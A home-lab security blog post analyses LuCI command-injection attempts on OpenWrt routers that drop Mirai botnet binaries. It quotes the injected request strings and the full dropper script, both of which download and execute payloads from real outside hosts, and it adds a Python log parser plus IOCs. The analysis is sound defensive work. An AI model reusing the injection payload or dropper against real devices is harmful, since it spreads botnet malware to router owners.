by Fred Theilig – @fmtheilig
My home server has been pretty quiet as of late. Sometimes because it’s literally quiet. I will shut it down from time to time because the fans will spin up to max and stay there, making one hell of a racket. Shutting it down a couple days, or a week, seems to give it the rest it needs to behave better. But also, I just haven’t seen anything.
Just past one in the morning on May 16th I got a couple of Suricata alerts: “ET HUNTING Suspicious Chmod Usage in URI (Inbound)”. The target was my web server and the IP addresses were 195.1.144.109 and 195.1.144.107, both in Oslo, Norway. The Apache logs showed:
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.15.222.150/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk)
This /cgi-bin/luci/ is new to me, but let’s decode the stuff between the parens:
cd /tmp; rm -rf shk; wget http://103.15.222.150/shk; chmod 777 shk; ./shk tplink; rm -rf shk
Now let’s take a look at this dropper:
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="103.15.222.150"
binout="telnetdbot"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ "$status" = "$exec" ]; then
rm -rf $binout
break
fi
rm -rf $binout
done
What this does is try each of ten different architecture builds of the payload in turn: download it using wget, curl, or tftp from 103.15.222.150, save it under the name ‘telnetdbot’ into /tmp, /var, or /dev (whichever directory it can change to), change the file permissions (chmod 777), then execute it, stopping at the first build that runs. Pretty brute force, but we’ve seen this before. Using tftp is a new one, but it makes sense: no username or password required.
I manually grabbed a copy of the x86 version of this malware. I keep my samples in a folder that clamav ignores. Perhaps it is better opsec were I to download a version for a different architecture, but I have yet to accidentally run malware on my system. I will hold on to the binary for future analysis. So, what is this telnetdbot that promises to infect me to a “bootnoot”? It’s Mirai, specifically trojan.mirai/aiju.
On June 2nd IP 176.97.210.236 sent some very similar traffic my way:
"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 26893 "-" "Go-http-client/1.1"
This is pretty much the same as before; the only real difference is the IP address. Let’s take a closer look at the target of the GET request. Apparently /cgi-bin/luci/ is LuCI WebUI, a configuration interface for OpenWrt.
OpenWrt is an open source router operating system that you can install on many brain-dead commercial routers, giving you much more power and control. I ran this prior to moving to pfSense. I had not heard of LuCI WebUI before.
I grabbed this payload and … of course it’s Mirai, but with a different hash. Note that having a different hash does not imply there is a significant difference from the previous version. Changing as little as a single character and recompiling is enough to do this. The IP of the command and control server may have changed, but recompiling is also frequently done just to defeat signature-based anti-malware software.
I hadn’t noticed before that shk is run with ‘tplink’ as a parameter, but the script does nothing with it. TP-Link is a Chinese manufacturer of consumer grade home routers, the kind one may install OpenWrt on.
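Here is the decoding done programmatically, as an added example rather than anything from the post: it URL-decodes the ‘country’ parameter, peels off the $( ) and backtick wrappers, and pulls out the drop host and the shell verbs the Suricata rule keyed on. The sample input is the two requests quoted above; the function and regex names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample input: the two request strings quoted in this post,
# one as a bare request line and one as a full Apache log line.
SAMPLE_LOG = r'''GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.15.222.150/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk)
"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 26893 "-" "Go-http-client/1.1"
'''

TARGET_RE = re.compile(r'/cgi-bin/luci/\S*')            # request target, up to whitespace
SUBST_RE = re.compile(r'\$\((.*)\)|`([^`]*)`', re.S)     # $( ... ) or ` ... `
URL_RE = re.compile(r'https?://[^\s;`\'")]+')             # download URLs inside the command
VERB_RE = re.compile(r'\b(wget|curl|tftp|chmod)\b')      # the verbs the IDS rule cares about

def decode_query(target):
    """Split the request target into its path and a dict of URL-decoded query params."""
    path, _, query = target.partition('?')
    params = {}
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params[unquote_plus(key)] = unquote_plus(value)
    return path, params

def extract_injection(value):
    """Return the innermost shell command hidden in $(...) or backticks, or None."""
    cmd, text = None, value
    while True:
        m = SUBST_RE.search(text)
        if not m:
            return cmd
        # each round strips one wrapper, so the second sample's id>`...` peels cleanly
        cmd = (m.group(1) if m.group(1) is not None else m.group(2)).strip()
        text = cmd

def analyse_line(line):
    """Flag a log line carrying a command injection in the LuCI 'country' parameter."""
    m = TARGET_RE.search(line)
    if not m:
        return None
    path, params = decode_query(m.group(0))
    cmd = extract_injection(params.get('country', ''))
    if cmd is None:
        return None
    urls = URL_RE.findall(cmd)
    return {'path': path, 'command': cmd,
            'verbs': sorted(set(VERB_RE.findall(cmd))),
            'download_urls': urls,
            'drop_hosts': sorted({u.split('/')[2] for u in urls})}

def analyse_log(text):
    """Run analyse_line over every line and keep only the hits."""
    return [r for r in (analyse_line(l) for l in text.splitlines()) if r]

if __name__ == '__main__':
    for hit in analyse_log(SAMPLE_LOG):
        print(hit['drop_hosts'], hit['verbs'], '->', hit['command'])
```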
Let’s look at the numbers for the May 16 event:
195.1.144.109 Oslo, Norway (GlobalConnect AS)
195.1.144.107 Oslo, Norway (GlobalConnect AS)
103.15.222.150 Vietnam (TAN THANH AN INTERNATIONAL TRADE DEVELOPMENT COMPANY LIMITED)
Telnetdbot SHA256: 283a9d3db3201f027ff81ace1b3daca94ec6cdbd6cde3ca5154fb01053f854b2
First Submission: May 16
And now for June 2:
176.97.210.236 Frankfurt am Main, Hesse, Germany
176.97.210.238 Frankfurt am Main, Hesse, Germany
Telnetdbot SHA256: 29866f6d51987d93baadb3478ef1c2ae91172d1d74e1bbeaf7ea8d4efaf8da8d
First Submission: May 31
My Takeaway:
First, if you are not using CyberChef, you are missing out. It comes built in with my Security Onion instance, but you can easily run it locally, or just use the URL. It decodes obfuscated text like a champ.
Second, it is surprising how recently these specific malware variants were first seen. The first one hit my server on day one and the second on day three.
Perhaps most importantly, the LuCI configuration interface is a thing and it might still have a vulnerability. The attacker may be using a very old vector of attack with brand new Mirai binaries, but I just don’t know. Had I not a full time job, and a fuller time life outside of my job, I might stand up an OpenWrt instance with LuCI and run some tests. Can you run OpenWrt in a VM? I feel like this should be possible.
If you run LuCI on OpenWrt, take care. Update it to the latest release, don’t present the interface to the open internet, and verify that you haven’t been ‘infected to a bootnoot’. Be careful out there.